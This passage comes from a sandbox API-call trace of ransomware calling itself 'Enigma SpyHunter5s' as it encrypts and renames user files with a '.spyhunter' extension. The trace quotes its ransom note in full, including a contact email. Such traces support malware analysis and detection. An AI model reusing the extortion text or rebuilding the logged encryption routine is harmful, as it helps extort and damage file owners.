dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb80*=0x30) returned 1 [0156.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.315] GetProcessHeap () returned 0x2c0000 [0156.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.315] GetProcessHeap () returned 0x2c0000 [0156.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a060 | out: hHeap=0x2c0000) returned 1 [0156.316] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb88 | out: pbBuffer=0x270eb88) returned 1 [0156.316] GetProcessHeap () returned 0x2c0000 [0156.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.316] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb80*=0x30) returned 1 [0156.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.316] GetProcessHeap () returned 0x2c0000 [0156.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.317] GetProcessHeap () returned 0x2c0000 [0156.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4ba90 | out: hHeap=0x2c0000) returned 1 [0156.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\3lkbqzj3\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.317] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.317] WriteFile (in: hFile=0x9c, lpBuffer=0x270eab7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ebe0, lpOverlapped=0x0 | out: lpBuffer=0x270eab7*, lpNumberOfBytesWritten=0x270ebe0*=0x127, lpOverlapped=0x0) returned 1 [0156.318] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.318] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ebe0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ebe0*=0x2ac, lpOverlapped=0x0) returned 1 [0156.319] CloseHandle (hObject=0x9c) returned 1 [0156.319] GetProcessHeap () returned 0x2c0000 [0156.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbbf28 | out: hHeap=0x2c0000) returned 1 [0156.319] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb80 | out: pbBuffer=0x270eb80) returned 1 [0156.319] GetProcessHeap () returned 0x2c0000 [0156.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.319] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb78*=0x30) returned 1 [0156.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.319] GetProcessHeap () returned 0x2c0000 [0156.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.319] GetProcessHeap () returned 0x2c0000 [0156.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a6f0 | out: hHeap=0x2c0000) returned 1 [0156.319] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb78 | out: pbBuffer=0x270eb78) returned 1 [0156.319] GetProcessHeap () returned 0x2c0000 [0156.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.319] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb70*=0x30) returned 1 [0156.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\3lkbqzj3\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.320] GetProcessHeap () returned 0x2c0000 [0156.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.320] GetProcessHeap () returned 0x2c0000 [0156.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b988 | out: hHeap=0x2c0000) returned 1 [0156.320] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb78 | out: pbBuffer=0x270eb78) returned 1 [0156.320] GetProcessHeap () returned 0x2c0000 [0156.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.320] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb70*=0x30) returned 1 [0156.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.320] GetProcessHeap () returned 0x2c0000 [0156.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.320] GetProcessHeap () returned 0x2c0000 [0156.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39228 | out: hHeap=0x2c0000) returned 1 [0156.320] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb70 | out: pbBuffer=0x270eb70) returned 1 [0156.320] GetProcessHeap () returned 0x2c0000 [0156.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.320] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb68*=0x30) returned 1 [0156.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.320] GetProcessHeap () returned 0x2c0000 [0156.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.321] GetProcessHeap () returned 0x2c0000 [0156.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39130 | out: hHeap=0x2c0000) returned 1 [0156.321] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb70 | out: pbBuffer=0x270eb70) returned 1 [0156.321] GetProcessHeap () returned 0x2c0000 [0156.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.321] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb68*=0x30) returned 1 [0156.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 87 [0156.349] StrStrW (lpFirst="brndlog.txt", lpSrch=".txt") returned=".txt" [0156.349] lstrlenW (lpString=".txt") returned 4 [0156.349] lstrlenW (lpString=".txt") returned 4 [0156.349] GetProcessHeap () returned 0x2c0000 [0156.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.350] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eb2c*=0x2800, lpOverlapped=0x0) returned 1 [0156.390] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.390] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eb2c*=0x2800, lpOverlapped=0x0) returned 1 [0156.390] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eb2c*=0x7b0, lpOverlapped=0x0) returned 1 [0156.391] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff850, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.391] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x270eb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eb2c*=0x7b0, lpOverlapped=0x0) returned 1 [0156.391] GetProcessHeap () returned 0x2c0000 [0156.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.391] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.391] WriteFile (in: hFile=0x178, lpBuffer=0x270eb6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb2c, lpOverlapped=0x0 | out: lpBuffer=0x270eb6c*, lpNumberOfBytesWritten=0x270eb2c*=0x4, lpOverlapped=0x0) returned 1 [0156.391] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb2c*=0x30, lpOverlapped=0x0) returned 1 [0156.391] CloseHandle (hObject=0x178) returned 1 [0156.391] GetProcessHeap () returned 0x2c0000 [0156.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.391] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.spyhunter") returned 97 [0156.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.spyhunter")) returned 1 [0156.392] GetProcessHeap () returned 0x2c0000 [0156.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.392] GetProcessHeap () returned 0x2c0000 [0156.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.392] GetProcessHeap () returned 0x2c0000 [0156.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39038 | out: hHeap=0x2c0000) returned 1 [0156.392] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb68 | out: pbBuffer=0x270eb68) returned 1 [0156.392] GetProcessHeap () returned 0x2c0000 [0156.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb60*=0x30) returned 1 [0156.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.403] GetProcessHeap () returned 0x2c0000 [0156.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.404] GetProcessHeap () returned 0x2c0000 [0156.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d378 | out: hHeap=0x2c0000) returned 1 [0156.404] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb68 | out: pbBuffer=0x270eb68) returned 1 [0156.404] GetProcessHeap () returned 0x2c0000 [0156.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.404] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb60*=0x30) returned 1 [0156.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 90 [0156.411] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0156.411] GetProcessHeap () returned 0x2c0000 [0156.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.411] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eb24*=0x43, lpOverlapped=0x0) returned 1 [0156.412] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.412] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x270eb24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eb24*=0x43, lpOverlapped=0x0) returned 1 [0156.413] GetProcessHeap () returned 0x2c0000 [0156.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.413] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.413] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb24, lpOverlapped=0x0 | out: lpBuffer=0x270eb64*, lpNumberOfBytesWritten=0x270eb24*=0x4, lpOverlapped=0x0) returned 1 [0156.413] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb24*=0x30, lpOverlapped=0x0) returned 1 [0156.413] CloseHandle (hObject=0xb0) returned 1 [0156.413] GetProcessHeap () returned 0x2c0000 [0156.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.413] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.spyhunter") returned 100 [0156.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini.spyhunter")) returned 1 [0156.445] GetProcessHeap () returned 0x2c0000 [0156.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.445] GetProcessHeap () returned 0x2c0000 [0156.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.445] GetProcessHeap () returned 0x2c0000 [0156.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44b28 | out: hHeap=0x2c0000) returned 1 [0156.445] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb60 | out: pbBuffer=0x270eb60) returned 1 [0156.446] GetProcessHeap () returned 0x2c0000 [0156.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.446] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb58*=0x30) returned 1 [0156.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0156.446] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 139 [0156.446] StrStrW (lpFirst="Suggested Sites~.feed-ms", lpSrch=".txt") returned 0x0 [0156.446] GetProcessHeap () returned 0x2c0000 [0156.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0156.446] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eb1c*=0x2800, lpOverlapped=0x0) returned 1 [0156.465] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.465] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eb1c*=0x2800, lpOverlapped=0x0) returned 1 [0156.466] GetProcessHeap () returned 0x2c0000 [0156.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0156.466] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.466] WriteFile (in: hFile=0xb0, lpBuffer=0x270eb5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eb1c, lpOverlapped=0x0 | out: lpBuffer=0x270eb5c*, lpNumberOfBytesWritten=0x270eb1c*=0x4, lpOverlapped=0x0) returned 1 [0156.466] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eb1c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eb1c*=0x30, lpOverlapped=0x0) returned 1 [0156.466] CloseHandle (hObject=0xb0) returned 1 [0156.466] GetProcessHeap () returned 0x2c0000 [0156.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.466] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.spyhunter") returned 149 [0156.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\suggested sites~.feed-ms.spyhunter")) returned 1 [0156.468] GetProcessHeap () returned 0x2c0000 [0156.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.468] GetProcessHeap () returned 0x2c0000 [0156.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.468] GetProcessHeap () returned 0x2c0000 [0156.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26420 | out: hHeap=0x2c0000) returned 1 [0156.468] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb60 | out: pbBuffer=0x270eb60) returned 1 [0156.468] GetProcessHeap () returned 0x2c0000 [0156.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.468] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb58*=0x30) returned 1 [0156.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 